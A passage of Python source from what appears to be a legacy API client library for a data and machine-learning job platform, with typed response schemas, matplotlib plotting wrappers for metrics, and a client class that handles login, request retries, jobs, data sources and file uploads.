"pausedJobs": Optional[List[Dict[str, str]]],
})
OverviewResponse = TypedDict('OverviewResponse', {
"jobs": JobsOverview,
"requests": Dict[str, int],
"sessions": Optional[List[Dict[str, Any]]],
"workers": Dict[str, List[str]],
})
InputDetailsResponse = TypedDict('InputDetailsResponse', {
"name": Optional[str],
"path": str,
"extension": Optional[str],
"inputId": str,
"lastByteOffset": Optional[int],
"size": Optional[int],
"progress": Optional[str],
})
UploadResponse = TypedDict('UploadResponse', {
"name": Optional[str],
"path": str,
"extension": Optional[str],
"inputId": str,
"lastByteOffset": Optional[int],
"size": Optional[int],
"progress": Optional[str],
"exists": bool,
})
InputItem = TypedDict('InputItem', {
"name": Optional[str],
"path": str,
"file": str,
"immutable": bool,
})
InputsResponse = TypedDict('InputsResponse', {
"systemFiles": List[InputItem],
"userFiles": List[InputItem],
})
EmptyDict = TypedDict('EmptyDict', {})
AggMetricPlot = TypedDict('AggMetricPlot', {
"inner": List[List[Union[str, float]]],
"plot": str,
"color": str,
"name": str,
"ticker": Optional[str],
"count": int,
"cat": bool,
"catValues": Optional[List[Union[str, float]]],
})
RangedPlot = TypedDict('RangedPlot', {
"xrange": List[str],
"yrange": List[float],
"lines": List[AggMetricPlot],
"kind": Literal["time"],
})
PlotCoords = List[Tuple[float, float]]
CoordPlot = TypedDict('CoordPlot', {
"name": str,
"color": str,
"coords": PlotCoords,
})
RangedCoords = TypedDict('RangedCoords', {
"xaxis": str,
"yaxis": str,
"xrange": List[float],
"yrange": List[float],
"coords": List[CoordPlot],
"kind": Literal["coord"],
})
MetricResponse = TypedDict('MetricResponse', {
"lines": Union[EmptyDict, RangedCoords, RangedPlot],
"pollHint": float,
})
MetricListResponse = TypedDict('MetricListResponse', {
"metrics": List[List[str]],
"selectedPlots": List[List[str]],
"hiddenPlots": List[List[str]],
"pollHint": float,
})
MetricListInfo = TypedDict('MetricListInfo', {
"metrics": List[List[str]],
"selected_plots": List[List[str]],
"hidden_plots": List[List[str]],
})
SummaryResponse = TypedDict('SummaryResponse', {
"messages": Dict[str, List[Tuple[str, List[StdoutLine]]]],
"exceptions": List[Tuple[str, List[StdoutLine]]],
"lastEvent": Optional[Tuple[str, str, str]],
"rows": Optional[int],
"rowsTotal": Optional[int],
"features": Optional[Dict[str, int]],
"droppedFeatures": Optional[Dict[str, int]],
"dataStart": Optional[str],
"dataHigh": Optional[str],
"dataEnd": Optional[str],
"pollHint": float,
})
SummaryInfo = TypedDict('SummaryInfo', {
"stdout": 'StdoutWrapper',
"last_event": Optional[Tuple[str, str, str]],
"rows": Optional[int],
"rows_total": Optional[int],
"features": Optional[Dict[str, int]],
"dropped_features": Optional[Dict[str, int]],
"data_start": Optional[pd.Timestamp],
"data_high": Optional[pd.Timestamp],
"data_end": Optional[pd.Timestamp],
})
JobStdoutResponse = TypedDict('JobStdoutResponse', {
"lines": List[StdoutLine],
"pollHint": float,
})
NotesResponse = TypedDict('NotesResponse', {
"usage": Dict[str, bool],
"roles": Dict[str, str],
"rolesRenamed": Dict[str, str],
"dummyColumns": List[str],
"stats": Dict[str, Dict[str, Any]],
"isRunnable": bool,
"suggestions": Dict[str, List[Dict[str, str]]],
"isPreview": bool,
"error": bool,
})
NotesInfo = TypedDict('NotesInfo', {
"usage": Dict[str, bool],
"roles": Dict[str, str],
"roles_renamed": Dict[str, str],
"dummy_columns": List[str],
"stats": Dict[str, Dict[str, Any]],
"is_runnable": bool,
"suggestions": Dict[str, List[Dict[str, str]]],
"is_preview": bool,
"error": bool,
})
PreviewNotesResponse = TypedDict('PreviewNotesResponse', {
"notes": Optional[NotesResponse],
})
StrategyResponse = TypedDict('StrategyResponse', {
"strategies": List[str],
"pollHint": float,
})
BacktestResponse = TypedDict('BacktestResponse', {
"pyfolio": Optional[Dict[str, Any]],
"output": Optional[List[StdoutLine]],
"errMessage": Optional[str],
"pollHint": float,
})
SegmentResponse = TypedDict('SegmentResponse', {
"segments": List[Tuple[int, Optional[str], Optional[str]]],
"pollHint": float,
})
SimplePredictionsResponse = TypedDict('SimplePredictionsResponse', {
"isClf": bool,
"columns": List[str],
"predsName": str,
"predictions": List[List[Union[str, float, int]]],
"allPredictions": List[List[Union[str, float, int]]],
"pollHint": float,
})
ForceFlushResponse = TypedDict('ForceFlushResponse', {
"success": bool,
})
JobColumnsResponse = TypedDict('JobColumnsResponse', {
"columns": List[str],
})
JobRegisterResponse = TypedDict('JobRegisterResponse', {
"success": bool,
})
HidePlotResponse = TypedDict('HidePlotResponse', {
"success": bool,
})
SelectPlotsResponse = TypedDict('SelectPlotsResponse', {
"selectedPlots": List[List[str]],
})
DataPlotListResponse = TypedDict('DataPlotListResponse', {
"dataPlots": List[List[str]],
"noOrdering": bool,
"hiddenPlots": List[List[str]],
"pollHint": float,
"selectedPlots": List[List[str]],
})
DataPlotListInfo = TypedDict('DataPlotListInfo', {
"data_plots": List[List[str]],
"selected_plots": List[List[str]],
"hidden_plots": List[List[str]],
})
def predictions_to_df(preds: PredictionsResponse) -> pd.DataFrame:
df = pd.DataFrame(preds["values"], columns=preds["columns"])
if "date" in df.columns: # pylint: disable=unsupported-membership-test
df["date"] = pd.to_datetime(df["date"])
return df
def maybe_predictions_to_df(
preds: Optional[PredictionsResponse]) -> Optional[pd.DataFrame]:
if preds is None:
return None
return predictions_to_df(preds)
class AccessDenied(Exception):
pass
# *** AccessDenied ***
class StdoutWrapper:
def __init__(self, stdout: StdoutResponse) -> None:
self._lines = stdout["lines"]
self._messages = stdout["messages"]
self._exceptions = stdout["exceptions"]
def full_output(self) -> str:
return "\n".join((line for _, line in self._lines))
def get_messages(self) -> Dict[str, List[Tuple[str, List[StdoutLine]]]]:
return self._messages
def get_exceptions(self) -> List[Tuple[str, List[StdoutLine]]]:
return self._exceptions
def __str__(self) -> str:
return self.full_output()
def __repr__(self) -> str:
return self.full_output()
# *** StdoutWrapper ***
class MetricWrapper(collections.abc.Sequence):
def get_xaxis(self) -> str:
raise NotImplementedError()
def get_yaxis(self) -> str:
raise NotImplementedError()
def get_xrange(self) -> Tuple[Any, Any]:
raise NotImplementedError()
def get_yrange(self) -> Tuple[Any, Any]:
raise NotImplementedError()
def is_coordinates(self) -> bool:
raise NotImplementedError()
def plot(self,
figsize: Optional[Tuple[int, int]] = None,
use_ranges: bool = False) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
draw = False
if figsize is not None:
plt.figure(figsize=figsize)
if len(self) == 1:
plt.title(self[0].get_name())
plt.xlabel(self.get_xaxis())
if self.is_coordinates():
plt.ylabel(self.get_yaxis())
if use_ranges:
def is_proper_range(v_range: Tuple[Any, Any]) -> bool:
return v_range[0] != v_range[1]
x_range = self.get_xrange()
if is_proper_range(x_range):
plt.xlim(x_range)
y_range = self.get_yrange()
if is_proper_range(y_range):
plt.ylim(y_range)
for plot in self:
plot.plot(show=False)
draw = True
if draw:
plt.show()
# *** MetricWrapper ***
class AggregatePlot:
def __init__(self, plot: AggMetricPlot) -> None:
self._id = plot["plot"]
self._name = plot["name"]
self._color = plot["color"]
self._ticker = plot["ticker"]
self._is_cat = plot["cat"]
self._cat_values = plot["catValues"]
self._count = plot["count"]
cols = ["date", "vmean", "vstddev", "q_low", "q_high", "vmin", "vmax"]
df = pd.DataFrame(plot["inner"], columns=cols)
if not df.empty:
df["date"] = pd.to_datetime(df["date"])
self._df = df
def get_id(self) -> str:
return self._id
def get_name(self) -> str:
return self._name
def get_color(self) -> str:
return self._color
def get_ticker(self) -> Optional[str]:
return self._ticker
def is_categorical(self) -> bool:
return self._is_cat
def get_categorical_values(self) -> Optional[List[Union[str, float]]]:
return self._cat_values
def get_aggregate_count(self) -> int:
return self._count
def is_single(self) -> bool:
return self._count == 1
def get_single_df(self) -> pd.DataFrame:
if not self.is_single():
raise ValueError("metric is aggregate")
res = self._df[["date", "vmean"]].copy()
if self._is_cat:
assert self._cat_values is not None
mapping = dict(enumerate(self._cat_values))
res["vmean"] = res["vmean"].map(mapping)
if self._ticker is None:
res = res.set_index(["date"])
else:
res["ticker"] = self._ticker
res = res.set_index(["ticker", "date"])
return res.rename(columns={"vmean": self._id})
def get_full_df(self) -> pd.DataFrame:
res = self._df.copy()
if self._ticker is None:
res = res.set_index(["date"])
else:
res["ticker"] = self._ticker
res = res.set_index(["ticker", "date"])
return res.rename(columns={
"vmean": f"{self._id}_mean",
"vstddev": f"{self._id}_stddev",
"q_low": f"{self._id}_q_low",
"q_high": f"{self._id}_q_high",
"vmin": f"{self._id}_min",
"vmax": f"{self._id}_max",
})
def plot(self, show: bool = True) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
df = self._df
if self.is_single():
plt.plot(
df["date"], df["vmean"], color=self._color, label=self._name)
else:
plt.plot(
df["date"], df["vmean"], color=self._color, label=self._name)
plt.fill_between(
df["date"], df["q_low"], df["q_high"], interpolate=True,
color=self._color, alpha=0.25)
plt.plot(df["date"], df["q_low"], color=self._color, alpha=0.25)
plt.plot(df["date"], df["q_high"], color=self._color, alpha=0.25)
plt.plot(
df["date"], df["vmin"], linestyle="dashed", color=self._color)
plt.plot(
df["date"], df["vmax"], linestyle="dashed", color=self._color)
if show:
plt.show()
# *** AggregatePlot ***
class MetricPlot(MetricWrapper):
def __init__(self, plot: RangedPlot) -> None:
self._xrange = (
pd.to_datetime(plot["xrange"][0]),
pd.to_datetime(plot["xrange"][-1]),
)
self._yrange = (plot["yrange"][0], plot["yrange"][-1])
self._plots = [AggregatePlot(plot) for plot in plot["lines"]]
@overload
def __getitem__(self, index: int) -> AggregatePlot:
...
@overload
def __getitem__(self, index: slice) -> List[AggregatePlot]:
...
def __getitem__(self,
index: Union[int, slice],
) -> Union[AggregatePlot, List[AggregatePlot]]:
return self._plots[index]
def __len__(self) -> int:
return len(self._plots)
def get_xaxis(self) -> str:
return "date"
def get_yaxis(self) -> str:
return "value"
def get_xrange(self) -> Tuple[Any, Any]:
return self._xrange
def get_yrange(self) -> Tuple[Any, Any]:
return self._yrange
def is_coordinates(self) -> bool:
return False
# *** MetricPlot ***
class CoordinatePlot:
def __init__(self, plot: CoordPlot) -> None:
self._name = plot["name"]
self._color = plot["color"]
self._df = pd.DataFrame(plot["coords"], columns=["x", "y"])
def get_name(self) -> str:
return self._name
def get_color(self) -> str:
return self._color
def get_df(self) -> pd.DataFrame:
return self._df.copy()
def plot(self, show: bool = True) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
df = self._df
plt.plot(df["x"], df["y"], color=self._color, label=self._name)
if show:
plt.show()
# *** CoordinatePlot ***
class MetricCoords(MetricWrapper):
def __init__(self, plot: RangedCoords) -> None:
self._xaxis = plot["xaxis"]
self._yaxis = plot["yaxis"]
self._xrange = (plot["xrange"][0], plot["xrange"][-1])
self._yrange = (plot["yrange"][0], plot["yrange"][-1])
self._plots = [CoordinatePlot(plot) for plot in plot["coords"]]
@overload
def __getitem__(self, index: int) -> CoordinatePlot:
...
@overload
def __getitem__(self, index: slice) -> List[CoordinatePlot]:
...
def __getitem__(
self,
index: Union[int, slice],
) -> Union[CoordinatePlot, List[CoordinatePlot]]:
return self._plots[index]
def __len__(self) -> int:
return len(self._plots)
def get_xaxis(self) -> str:
return self._xaxis
def get_yaxis(self) -> str:
return self._yaxis
def get_xrange(self) -> Tuple[Any, Any]:
return self._xrange
def get_yrange(self) -> Tuple[Any, Any]:
return self._yrange
def is_coordinates(self) -> bool:
return True
# *** MetricCoords ***
class XYMELegacyClient:
def __init__(
self,
url: str,
user: Optional[str],
password: Optional[str],
token: Optional[str]) -> None:
self._url = url.rstrip("/")
if user is None:
user = os.environ.get("ACCERN_USER")
self._user = user
if password is None:
password = os.environ.get("ACCERN_PASSWORD")
self._password = password
self._token: Optional[str] = token
self._last_action = time.monotonic()
self._auto_refresh = True
self._permissions: Optional[List[str]] = None
def get_version(legacy: bool) -> int:
server_version = self.get_server_version(legacy)
version = server_version.get("apiVersion", "v0")
if isinstance(version, str):
version = int(version.lstrip("v"))
return int(version)
try:
self._api_version = min(get_version(False), API_VERSION)
except ValueError:
self._api_version = min(get_version(True), API_VERSION)
self._init()
def get_api_version(self) -> int:
return self._api_version
def _init(self) -> None:
if self._token is None:
self._login()
return
res = cast(UserLogin, self._request_json(
METHOD_GET, "/init", {}, capture_err=False))
if not res["success"]:
raise AccessDenied("init was not successful")
self._token = res["token"]
self._permissions = res["permissions"]
def get_permissions(self) -> List[str]:
if self._permissions is None:
self._init()
assert self._permissions is not None
return self._permissions
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
self.set_auto_refresh(old_refresh)
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> BytesIO:
retry = 0
while True:
try:
return self._fallible_raw_request_bytes(
method, path, args, add_prefix, api_version)
except requests.ConnectionError:
if retry >= get_max_retry():
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
while True:
try:
return self._fallible_raw_request_json(
method, path, args, add_prefix, files, api_version)
except requests.ConnectionError:
if retry >= get_max_retry():
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
except AccessDenied as adex:
if not reset_files():
raise ValueError(
"cannot reset file buffers for retry") from adex
raise adex
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
api_version: Optional[int]) -> BytesIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
if method == METHOD_GET:
req = requests.get(url, params=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return BytesIO(req.content)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_POST:
req = requests.post(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return BytesIO(req.content)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
if method != METHOD_FILE and files is not None:
raise ValueError(
f"files are only allow for post (got {method}): {files}")
req = None
try:
if method == METHOD_GET:
req = requests.get(url, params=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(url, data=args, files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
})
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_POST:
req = requests.post(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_PUT:
req = requests.put(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_DELETE:
req = requests.delete(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_LONGPOST:
try:
return quick_server.worker_request(url, args)
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as json_e:
if req is None:
raise
raise ValueError(req.text) from json_e
def _login(self) -> None:
if self._user is None or self._password is None:
raise ValueError("cannot login without user or password")
res = cast(UserLogin, self._raw_request_json(METHOD_POST, "/login", {
"user": self._user,
"pw": self._password,
}))
if not res["success"]:
raise AccessDenied("login was not successful")
self._token = res["token"]
self._permissions = res["permissions"]
def logout(self) -> None:
if self._token is None:
return
self._raw_request_json(METHOD_POST, "/logout", {
"token": self._token,
})
def _request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> BytesIO:
if self._token is None:
self._login()
def execute() -> BytesIO:
args["token"] = self._token
return self._raw_request_bytes(
method, path, args, add_prefix, api_version)
try:
return execute()
except AccessDenied:
self._login()
return execute()
def _request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
capture_err: bool,
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
if self._token is None:
self._login()
def execute() -> Dict[str, Any]:
args["token"] = self._token
res = self._raw_request_json(
method, path, args, add_prefix, files, api_version)
if capture_err and "errMessage" in res and res["errMessage"]:
raise ValueError(res["errMessage"])
return res
try:
return execute()
except AccessDenied:
self._login()
return execute()
def get_user_info(self) -> UserInfo:
return cast(UserInfo, self._request_json(
METHOD_POST, "/username", {}, capture_err=False))
def get_server_version(self, legacy: bool = False) -> VersionInfo:
if legacy:
return cast(VersionInfo, self._raw_request_json(
METHOD_GET, "/version", {}, api_version=0))
return cast(VersionInfo, self._raw_request_json(
METHOD_GET, "/xyme/version", {}, add_prefix=False))
def afterupdate(self) -> MaintenanceInfo:
return cast(MaintenanceInfo, self._request_json(
METHOD_POST, "/afterupdate", {}, capture_err=False))
def set_maintenance_mode(self, is_maintenance: bool) -> MaintenanceInfo:
"""Set the maintenance mode of the server
Args:
is_maintenance (bool): If the server should be in maintenance mode.
Returns:
MaintenanceInfo: MaintenanceInfo object.
"""
return cast(MaintenanceInfo, self._request_json(
METHOD_PUT, "/maintenance", {
"isMaintenance": is_maintenance,
}, capture_err=False))
def get_maintenance_mode(self) -> HintedMaintenanceInfo:
return cast(HintedMaintenanceInfo, self._request_json(
METHOD_GET, "/maintenance", {}, capture_err=False))
def get_system_logs(
self,
query: Optional[str] = None,
context: Optional[int] = None) -> StdoutWrapper:
obj: Dict[str, Any] = {
"logsKind": "regular",
}
if query is not None:
obj["query"] = query
if context is not None:
obj["context"] = context
res = cast(SystemLogResponse, self._request_json(
METHOD_GET, "/monitor_logs", obj, capture_err=False))
return StdoutWrapper({
"lines": res["logs"] if res["logs"] is not None else [],
"messages": {},
"exceptions": [],
})
def get_system_overview(self) -> OverviewResponse:
return cast(OverviewResponse, self._request_json(
METHOD_GET, "/overview", {}, capture_err=False))
def create_job(
self,
schema: Optional[Dict[str, Any]] = None,
from_job_id: Optional[str] = None,
name: Optional[str] = None,
is_system_preset: bool = False) -> 'JobHandle':
schema_str = json.dumps(schema) if schema is not None else None
obj: Dict[str, Any] = {
"schema": schema_str,
}
if schema_str is not None and schema_str:
obj["isSystemPreset"] = is_system_preset
if from_job_id is not None:
obj["fromId"] = from_job_id
if name is not None:
obj["name"] = name
res = cast(JobCreateResponse, self._request_json(
METHOD_LONGPOST, "/create_job_id", obj, capture_err=True))
return JobHandle(
client=self,
job_id=res["jobId"],
path=res["path"],
name=res["name"],
schema_obj=json.loads(res["schema"]),
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def get_job(self, job_id: str) -> 'JobHandle':
return JobHandle(
client=self,
job_id=job_id,
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def start_job(
self,
job_id: Optional[str],
job_name: Optional[str] = None,
schema: Optional[Dict[str, Any]] = None,
user: Optional[str] = None,
company: Optional[str] = None,
nowait: Optional[bool] = None) -> JobStartResponse:
obj: Dict[str, Any] = {}
if job_id is not None:
if job_name is not None or schema is not None:
raise ValueError(
"can only start by job_id or by job_name and schema "
f"job_id: {job_id} job_name: {job_name} schema: {schema}")
obj["jobId"] = job_id
else:
obj["job_name"] = job_name
obj["schema"] = json.dumps(schema)
if user is not None:
obj["user"] = user
if company is not None:
obj["company"] = company
if nowait is not None:
obj["nowait"] = nowait
return cast(JobStartResponse, self._request_json(
METHOD_LONGPOST, "/start", obj, capture_err=True))
def _raw_job_list(
self,
search: Optional[str] = None,
selected_status: Optional[List[str]] = None,
active_workspace: Optional[List[str]] = None,
) -> JobListResponse:
obj: Dict[str, Any] = {}
if search is not None:
obj["search"] = search
if selected_status is not None:
obj["selectedStatus"] = selected_status
if active_workspace is not None:
obj["activeWorkspace"] = active_workspace
return cast(JobListResponse, self._request_json(
METHOD_LONGPOST, "/jobs", obj, capture_err=False))
def get_workspaces(self) -> Dict[str, int]:
res = self._raw_job_list(None, None, None)
return res["counts"]
def get_jobs(self, workspace: str) -> List['JobHandle']:
res = self._raw_job_list(None, None, [workspace])
return [
JobHandle(
client=self,
job_id=job["jobId"],
path=job["path"],
name=job["name"],
schema_obj=None,
kinds=job["kinds"],
status=job["status"],
permalink=job["permalink"],
time_total=job["timeTotal"],
time_start=job["timeStart"],
time_end=job["timeEnd"],
time_estimate=job["timeEstimate"])
for job in res["jobs"][workspace]
]
def get_shareable(self) -> List[ShareablePath]:
res = cast(ShareList, self._request_json(
METHOD_LONGPOST, "/share", {}, capture_err=False))
return [{
"name": name,
"path": path,
} for (name, path) in res["shareable"]]
def _raw_create_source(
self,
source_type: str,
name: Optional[str],
job: Optional['JobHandle'],
multi_source: Optional['SourceHandle'],
from_id: Optional['SourceHandle'],
) -> CreateSource:
if source_type not in ALL_SOURCE_TYPES:
raise ValueError(
f"invalid source type: {source_type}\nmust be one of "
f"{', '.join(ALL_SOURCE_TYPES)}")
multi_source_id = None
if multi_source is not None:
if not multi_source.is_multi_source():
raise ValueError(
f"source {multi_source.get_source_id()} "
"must be multi source")
multi_source_id = multi_source.get_source_id()
from_id_str = from_id.get_source_id() if from_id is not None else None
res = cast(CreateSourceResponse, self._request_json(
METHOD_LONGPOST, "/create_source_id", {
"name": name,
"type": source_type,
"job": job.get_job_id() if job is not None else None,
"multiSourceId": multi_source_id,
"fromId": from_id_str,
}, capture_err=True))
job_schema_str = res["jobSchema"]
if job is not None and job_schema_str:
job._schema_obj = json.loads(job_schema_str)
return {
"multi_source": SourceHandle(
self, res["multiSourceId"], SOURCE_TYPE_MULTI),
"source": SourceHandle(self, res["sourceId"], source_type),
}
def create_multi_source(self, name: Optional[str]) -> 'SourceHandle':
res = self._raw_create_source(
SOURCE_TYPE_MULTI, name, None, None, None)
return res["multi_source"]
def create_multi_source_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
name_multi: Optional[str] = None,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'SourceHandle':
with self.bulk_operation():
multi = self.create_multi_source(name_multi)
multi.add_new_source_file(
filename, ticker_column, date_column, progress_bar)
return multi
def create_multi_source_df(
self,
df: pd.DataFrame,
name_csv: str,
ticker_column: str,
date_column: Optional[str],
name_multi: Optional[str] = None,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'SourceHandle':
with self.bulk_operation():
multi = self.create_multi_source(name_multi)
multi.add_new_source_df(
df, name_csv, ticker_column, date_column, progress_bar)
return multi
def get_source(self, source_id: str) -> 'SourceHandle':
return SourceHandle(self, source_id, None, infer_type=True)
def set_immutable_raw(
self,
source: 'SourceHandle',
multi_source: Optional['SourceHandle'],
job: Optional['JobHandle'],
is_immutable: Optional[bool]) -> LockSource:
multi_source_id = None
if multi_source is not None:
if not multi_source.is_multi_source():
raise ValueError(
f"source {multi_source.get_source_id()} "
"must be multi source")
multi_source_id = multi_source.get_source_id()
res = cast(LockSourceResponse, self._request_json(
METHOD_PUT, "/lock_source", {
"sourceId": source.get_source_id(),
"multiSourceId": multi_source_id,
"job": job.get_job_id() if job is not None else None,
"immutable": is_immutable,
}, capture_err=False))
if "multiSourceId" not in res:
res["multiSourceId"] = None
if "sourceSchemaMap" not in res:
res["sourceSchemaMap"] = {}
job_schema_str = res["jobSchema"]
if job is not None and job_schema_str:
job._schema_obj = json.loads(job_schema_str)
if res["newSourceId"] == source.get_source_id():
new_source = source
else:
new_source = SourceHandle(
self, res["newSourceId"], source.get_source_type())
if res["multiSourceId"] is None:
new_multi_source: Optional[SourceHandle] = None
elif res["multiSourceId"] == new_source.get_source_id():
new_multi_source = new_source
elif res["multiSourceId"] == source.get_source_id():
new_multi_source = source
elif multi_source is not None and \
res["multiSourceId"] == multi_source.get_source_id():
new_multi_source = multi_source
else:
new_multi_source = SourceHandle(
self, res["multiSourceId"], SOURCE_TYPE_MULTI)
return {
"new_source": new_source,
"immutable": res["immutable"],
"multi_source": new_multi_source,
"source_schema_map": res["sourceSchemaMap"],
}
def get_sources(
self,
filter_by: Optional[str] = None) -> Iterable['SourceHandle']:
if filter_by is not None and filter_by not in FILTERS:
raise ValueError(f"invalid value for filter_by: {filter_by}")
res = cast(SourcesResponse, self._request_json(
METHOD_GET, "/sources", {}, capture_err=False))
def respond(arr: List[SourceItem]) -> Iterable['SourceHandle']:
for source in arr:
yield SourceHandle(
self, source["id"], source["type"], infer_type=True,
name=source["name"], immutable=source["immutable"],
help_message=source["help"])
if filter_by is None or filter_by == FILTER_SYSTEM:
yield from respond(res["systemSources"])
if filter_by is None or filter_by == FILTER_USER:
yield from respond(res["userSources"])
def create_input(
self,
name: str,
ext: str,
size: int,
hash_str: Optional[str]) -> 'InputHandle':
res = cast(CreateInputResponse, self._request_json(
METHOD_LONGPOST, "/create_input_id", {
"name": name,
"extension": ext,
"size": size,
"hash": None if self.get_api_version() < 1 else hash_str,
}, capture_err=False))
return InputHandle(self, res["inputId"], name=name, ext=ext, size=size)
def get_input(self, input_id: str) -> 'InputHandle':
return InputHandle(self, input_id)
def input_from_io(
self,
io_in: IO[bytes],
name: str,
ext: str,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'InputHandle':
from_pos = io_in.seek(0, io.SEEK_CUR)
size = io_in.seek(0, io.SEEK_END) - from_pos
io_in.seek(from_pos, io.SEEK_SET)
hash_str = get_file_hash(io_in)
with self.bulk_operation():
res: InputHandle = self.create_input(name, ext, size, hash_str)
if not res.is_complete():
res.upload_full(io_in, name, progress_bar)
return res
def input_from_file(
self,
filename: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'InputHandle':
if filename.endswith(f"{INPUT_CSV_EXT}{INPUT_ZIP_EXT}") \
or filename.endswith(f"{INPUT_TSV_EXT}{INPUT_ZIP_EXT}"):
filename = filename[:-len(INPUT_ZIP_EXT)]
ext_pos = filename.rfind(".")
if ext_pos >= 0:
ext = filename[ext_pos + 1:]
else:
ext = ""
fname = os.path.basename(filename)
with open(filename, "rb") as fbuff:
return self.input_from_io(fbuff, fname, ext, progress_bar)
def input_from_df(
self,
df: pd.DataFrame,
name: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'InputHandle':
io_in = df_to_csv(df)
return self.input_from_io(io_in, name, "csv", progress_bar)
def get_inputs(
self, filter_by: Optional[str] = None) -> Iterable['InputHandle']:
if filter_by is not None and filter_by not in FILTERS:
raise ValueError(f"invalid value for filter_by: {filter_by}")
res = cast(InputsResponse, self._request_json(
METHOD_GET, "/user_files", {}, capture_err=False))
def respond(arr: List[InputItem]) -> Iterable['InputHandle']:
for input_obj in arr:
filename = input_obj["file"]
ext_pos = filename.rfind(".")
if ext_pos >= 0:
ext: Optional[str] = filename[ext_pos + 1:]
input_id = filename[:ext_pos]
else:
ext = None
input_id = filename
progress = UPLOAD_DONE if input_obj["immutable"] else None
yield InputHandle(
self,
input_id,
name=input_obj["name"],
path=input_obj["path"],
ext=ext,
progress=progress)
if filter_by is None or filter_by == FILTER_SYSTEM:
yield from respond(res["systemFiles"])
if filter_by is None or filter_by == FILTER_USER:
yield from respond(res["userFiles"])
def get_strategies(self) -> List[str]:
res = cast(StrategyResponse, self._request_json(
METHOD_GET, "/strategies", {}, capture_err=False))
return res["strategies"]
def register(self, user_folder: str) -> bool:
method = METHOD_PUT if self._api_version < 2 else METHOD_LONGPOST
return cast(JobRegisterResponse, self._request_json(
method, "/register_job", {
"userFolder": user_folder,
}, capture_err=True)).get("success", False)
# *** XYMELegacyClient ***
class JobHandle:
def __init__(
self,
client: XYMELegacyClient,
job_id: str,
path: Optional[str],
name: Optional[str],
schema_obj: Optional[Dict[str, Any]],
kinds: Optional[List[str]],
status: Optional[str],
permalink: Optional[str],
time_total: Optional[float],
time_start: Optional[str],
time_end: Optional[str],
time_estimate: Optional[str]) -> None:
self._client = client
self._job_id = job_id
self._name = name
self._path = path
self._schema_obj = schema_obj
self._kinds = kinds
self._permalink = permalink
self._status = status
self._time_total = time_total
self._time_start = time_start
self._time_end = time_end
self._time_estimate = time_estimate
self._buttons: Optional[List[str]] = None
self._can_rename: Optional[bool] = None
self._is_symjob: Optional[bool] = None
self._is_user_job: Optional[bool] = None
self._plot_order_types: Optional[List[str]] = None
